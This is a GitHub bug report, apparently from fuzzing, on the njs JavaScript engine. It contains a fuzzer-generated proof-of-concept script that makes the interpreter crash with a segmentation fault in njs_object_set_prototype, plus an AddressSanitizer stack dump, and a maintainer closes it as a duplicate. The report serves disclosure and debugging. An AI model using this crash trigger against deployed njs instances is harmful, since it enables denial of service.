Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

SEGV src/njs_object.c:2136:24 in njs_object_set_prototype #519

Closed
dramthy opened this issue Jun 1, 2022 · 1 comment
Closed

SEGV src/njs_object.c:2136:24 in njs_object_set_prototype #519

dramthy opened this issue Jun 1, 2022 · 1 comment
Labels
bug duplicate fuzzer

Comments

@dramthy
Copy link

dramthy commented Jun 1, 2022

Environment

Commit  : c62a9fb92b102c90a66aa724cb9054183a33a68c
Version : 0.7.5
Build   : 
     ./configure --cc=clang --address-sanitizer=YES     
     make

Proof of concept

// Minimizing BF8BD01B-A07F-4C27-8062-56FCC05AAD64
function placeholder(){}
function main() {
var v6 = `
    var v7 = Object(-9007199254740993,-4027512271n);
`;
var v12 = `
    var v13 = (-256n)(-9007199254740993,-4027512271n);
`;
var v23 = `
    Object[-4027512271] **= -4027512271n;
    var v25 = Object(-9007199254740993,...-65536n);
`;
var v29 = `
    var v30 = Object(-9007199254740993,-4027512271n);
`;
var v33 = `
    var v34 = Object(-9007199254740993,-9007199254740993n);
`;
var v38 = `
    var v39 = undefined(-1290018985n,-4027512271n);
`;
var v45 = [-1000000.0,-1000000.0,-1000000.0];
var v53 = `
    var v54 = (-1.7976931348623157e+308)(8980,-4027512271n);
`;
var v55 = `
    (-4027512271n)[-4027512271] **= -4027512271n;
    var v56 = Object(0n,-4027512271n);
`;
function v62(v63) {
    v63[1866532165] = Map;
}
function v64(v65,v66) {
    var v73 = new Uint8ClampedArray();
    var v76 = {};
    var v77 = /gL8?/;
    var v78 = {};
    var v79 = [v76,v78,v77];
    function v81(v82) {
        v79[1866532165] = Map;
    }
    async function v85(v86,v87) {
        var v88 = await Map;
    }
    function v89(v90,v91) {
    }
    var v93 = new Promise(v89);
    var v95 = v93["catch"]();
    var v98 = {"get":Promise,"set":v85};
    var v99 = Object.defineProperty(v95,"constructor",v98);
    async function v100(v101,v102) {
        var v103 = await v99;
    }
    var v104 = v100();
    var v105 = v81(Map);
    var v106 = String();
    var v117 = `
        var v118 = Object(-9007199254740993,-4027512271n);
    `;
    var v119 = `
        (-4027512271n)[-4027512271] **= -4027512271n;
    `;
    var v125 = `
        var v127 = [-4027512271n,Object,-4027512271n,1,v73,-4027512271n,Object,Uint8ClampedArray,8980,Object];
        var v128 = Object();
        v128[-4027512271] **= -4027512271n;
    `;
    var v135 = `
        var v136 = Object(-9007199254740993,-4027512271n,0,-4027512271n);
    `;
    var v143 = `
        var v144 = Object(-9007199254740993,-4027512271n,15034n);
    `;
    var v147 = `
        var v148 = Object(-4294967296,-4027512271n);
    `;
    var v156 = `
        var v157 = (-4027512271n)(-9007199254740993,-4027512271n);
    `;
    var v167 = `
        Object[-4027512271] **= -4027512271n;
        var v169 = Object(-9007199254740993,-4027512271n);
    `;
    var v171 = `
        var v172 = Object(-9007199254740993,-9007199254740993n);
    `;
    var v176 = `
        var v177 = undefined(-4027512271n,-4027512271n);
    `;
    var v182 = `
        var v183 = "bigint"();
        v183[-4027512271] **= -4027512271n;
        var v184 = Object(-4027512271n,-4027512271n);
    `;
    var v185 = `
        (-4027512271n)[-4027512271] **= -4027512271n;
        var v186 = Object(-9007199254740993,-4027512271n);
    `;
    var v190 = `
        var v191 = ReferenceError(-4027512271n,-4027512271n);
    `;
    var v194 = Float64Array();
    var v199 = `
        v194[-4027512271] **= -4027512271n;
        var v200 = Object(-9007199254740993,-4027512271n);
    `;
    var v201 = `
        var v202 = Object(-4027512271n,-4027512271n);
    `;
    var v206 = `
        var v207 = (-1070059123)(-9007199254740993,-4027512271n);
    `;
    var v208 = `
        var v209 = ArrayBuffer(-4027512271n,-9007199254740993n);
    `;
    var v215 = `
        var v216 = undefined(-4027512271n,-4027512271n,Uint8ClampedArray,8980,-4027512271n);
    `;
    var v221 = `
        var v222 = (-4027512271n)();
        var v223 = v222(0n,-4027512271n);
    `;
    var v227 = `
        var v229 = Object();
        v229[-1316174388] >>= -4027512271n;
        var v231 = Object["getPrototypeOf"](v106,-4027512271n);
        var v232 = Object(-4027512271n,-4027512271n);
    `;
    var v233 = `
        (-4027512271n)[-4027512271] **= -4027512271n;
        var v234 = Symbol(-9007199254740993,-4027512271n);
    `;
    Promise[-4294967297] = Map;
}
var v236 = new Promise(v64);
var v244 = Object();
var v245 = `
    var v246 = Object(-9007199254740993,-4027512271n);
`;
var v247 = `
    var v248 = v247();
    v248[-4027512271] **= -4027512271n;
    var v249 = Object(v244,-4027512271n);
`;
var v250 = `
    Object[-4027512271] **= -4027512271n;
    var v252 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v256 = `
    var v257 = (-4027512271n)(-9007199254740993,-2147483649n);
`;
var v260 = `
    var v261 = (-4027512271n)(v45,-4027512271n);
`;
var v267 = `
    var v268 = Error(-9007199254740993,3272380054n,Uint8ClampedArray,8980,0n);
`;
var v272 = `
    var v273 = (-4027512271n)(-9007199254740993,-4027512271n);
`;
var v274 = `
    var v276 = Object();
    v276[-4027512271] **= -767560483n;
    var v277 = Object(-4027512271n,-3242169687n);
`;
var v278 = `
    (-4027512271n)[-4027512271] **= -4027512271n;
    var v279 = Object(-9007199254740993,-4027512271n);
`;
var v283 = `
    var v284 = (-9007199254740993)();
    v284[-4027512271] **= -4027512271n;
    var v285 = v284(0n,-4027512271n);
`;
var v290 = `
    undefined[-4027512271] **= -4027512271n;
    var v291 = Object(...-2691822435,2828643507n);
`;
var v294 = Object.setPrototypeOf(Object,Object);
}
main();
// CRASH INFO
// ==========
// TERMSIG: 11

Stack dump

AddressSanitizer:DEADLYSIGNAL
=================================================================
==8722==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x00000054516b bp 0x7ffe496426b0 sp 0x7ffe49642670 T0)
==8722==The signal is caused by a READ memory access.
==8722==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
    #0 0x54516b in njs_object_set_prototype /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:2136:24
    #1 0x54516b in njs_object_set_prototype_of /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:1531:11
    #2 0x575aae in njs_function_native_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:728:11
    #3 0x573e1c in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:766:16
    #4 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
    #5 0x574c72 in njs_function_lambda_call /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:693:11
    #6 0x573e4f in njs_function_frame_invoke /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_function.c:769:16
    #7 0x503e61 in njs_vmcode_interpreter /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vmcode.c:799:23
    #8 0x4fa5ae in njs_vm_start /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_vm.c:541:11
    #9 0x4df3fb in njs_process_script /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:1132:19
    #10 0x4e007f in njs_process_file /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:836:11
    #11 0x4ddbe8 in main /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_shell.c:483:15
    #12 0x7f8a08a31082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: 1878e6b475720c7c51969e69ab2d276fae6d1dee)
    #13 0x41ea7d in _start (/home/ubuntu/njs-fuzz/JSEngine/njs-target/build/njs+0x41ea7d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/ubuntu/njs-fuzz/JSEngine/njs/src/njs_object.c:2136:24 in njs_object_set_prototype
==8722==ABORTING

Credit
dramthy(@topsec alpha)
@xeioex
Copy link
Contributor

xeioex commented Jun 2, 2022

Duplicate of #506.

@xeioex xeioex closed this as completed Jun 2, 2022
@dramthy dramthy mentioned this issue Jun 2, 2022
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug duplicate fuzzer
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@xeioex @dramthy